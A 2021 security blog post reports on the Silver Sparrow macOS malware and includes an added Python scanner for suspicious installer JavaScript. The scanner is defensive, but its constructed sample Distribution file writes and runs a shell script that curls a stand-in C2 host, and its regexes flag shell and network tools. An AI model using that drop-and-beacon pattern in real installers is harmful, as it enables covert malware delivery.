Wednesday 24th February 2021

BLOG: 30,000 MacBooks Infected By New “Silver Sparrow” Malware

There is a popular belief that Apple-made computers are largely resistant to malware; as of recently, however, it appears that advanced hackers and threat actors may have debunked this theory. Researchers have now unveiled another previously concealed piece of malicious software, found on about 30,000 Macs running both Intel x86_64 and the iPhone maker’s M1 processors.

However, the aim of this malware remains something of a mystery: researchers are currently unsure of its distribution timeline and of whether the threat is simply still under active development.

The malware, dubbed “Silver Sparrow” by industry professionals, exists in two different versions: one compiled only for Intel x86_64 and uploaded to VirusTotal on August 31, 2020 (version 1), and a second variant submitted to the database on January 22 that is compatible with both Intel x86_64 and M1 ARM64 architectures (version 2). Upon execution, the x86_64 binary displays the message “Hello, World!” whereas the M1 binary reads “You did it!”, which the researchers suspect is a placeholder.

Industry professionals explained that the Mach-O compiled binaries don’t appear to “do all that much”, and as a result they have been labelled ‘bystander binaries’. Researchers also explained that there is no way of knowing with certainty what payload would be distributed by the malware, whether a payload has already been delivered and removed, or whether the adversary has a future timeline for distribution.

As of February 17, the 29,139 infected macOS endpoints were located across 153 countries, with the highest volumes of exposure in the United States, the United Kingdom, Canada, France, and Germany, according to data from Malwarebytes.

Despite targeting different macOS platforms, the two samples follow the same modus operandi: they use the macOS Installer JavaScript API to execute attack commands by dynamically generating two shell scripts that are written to the target’s file system.

While “agent.sh” executes immediately at the end of the installation to inform an AWS command-and-control (C2) server of a successful installation, “verx.sh” runs once every hour, contacting the C2 server for additional content to download and execute. 
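As an added defensive example (not from the original post or the researchers it cites), the following Python scans a .pkg’s Distribution XML for embedded installer JavaScript that calls `system.run` to drop or execute shell scripts, the pattern described above. The sample Distribution file, its file paths and its domain are constructed for illustration and are not the real Silver Sparrow installer.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample Distribution file (hypothetical, not the real Silver Sparrow installer):
# the embedded JavaScript writes a shell script to disk and runs it during installation.
SAMPLE_DISTRIBUTION = """<installer-gui-script minSpecVersion="2">
  <title>Updater</title>
  <options customize="never" require-scripts="true"/>
  <installation-check script="install_check()"/>
  <script><![CDATA[
  function install_check() {
      // drop a beacon script, then execute it (hypothetical paths and domain)
      system.run('/bin/sh', '-c', 'echo "curl -s https://c2.example.invalid/ping" > /tmp/agent.sh');
      system.run('/bin/sh', '-c', 'sh /tmp/agent.sh');
      return true;
  }
  ]]></script>
</installer-gui-script>
"""

# Indicators worth counting in installer JavaScript; none is malicious on its own, but
# system.run combined with dropped .sh files or network tools is rare in legitimate packages.
INDICATORS = {
    "system_run": re.compile(r"\bsystem\.run\s*\("),
    "shell_interpreter": re.compile(r"['\"]/bin/(?:ba|z)?sh['\"]"),
    "shell_script_path": re.compile(r"\S+\.sh\b"),
    "network_tool": re.compile(r"\b(?:curl|wget)\b"),
}

def extract_scripts(distribution_xml: str) -> list[str]:
    """Return the JavaScript text of every <script> element in a Distribution file."""
    root = ET.fromstring(distribution_xml)
    return [(el.text or "") for el in root.iter("script")]

def scan_distribution(distribution_xml: str) -> dict[str, int]:
    """Count how often each indicator appears across all embedded installer JavaScript."""
    hits = {name: 0 for name in INDICATORS}
    for script in extract_scripts(distribution_xml):
        for name, pattern in INDICATORS.items():
            hits[name] += len(pattern.findall(script))
    return hits

def is_suspicious(distribution_xml: str) -> bool:
    """Flag a package whose installer JavaScript runs a shell and touches .sh files or network tools."""
    hits = scan_distribution(distribution_xml)
    return hits["system_run"] > 0 and (hits["shell_script_path"] > 0 or hits["network_tool"] > 0)
```

To inspect a real package, expand it with `pkgutil --expand` and feed the extracted `Distribution` file to `is_suspicious`.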

Additionally, the malware comes with the capability to completely erase its presence from the compromised host, suggesting that the threat actors behind this operation place a high priority on stealth.

Silver Sparrow is a new piece of malware that includes code running natively on Apple’s new M1 chip. It has not yet delivered any additional malicious actions, but its compatibility with the M1 chip, widespread global reach, relatively high infection rate, and operational maturity suggest that Silver Sparrow is a threat uniquely positioned to deliver a potentially impactful payload at a moment’s notice.

Apple released a statement notifying customers and the general public that any software downloaded outside of the Mac App Store is subject to technical mechanisms that identify malware and block it so that it cannot run. With new malware being discovered so consistently, it raises the prospect that we may reach a stage where advanced malware becomes harder to detect and remove.
